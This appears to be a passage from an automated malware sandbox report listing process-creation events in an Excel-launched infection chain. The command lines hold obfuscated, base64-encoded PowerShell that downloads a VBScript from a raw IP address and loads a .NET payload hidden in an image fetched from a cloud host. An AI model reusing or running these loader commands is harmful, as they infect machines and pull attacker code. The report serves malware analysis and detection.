ICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg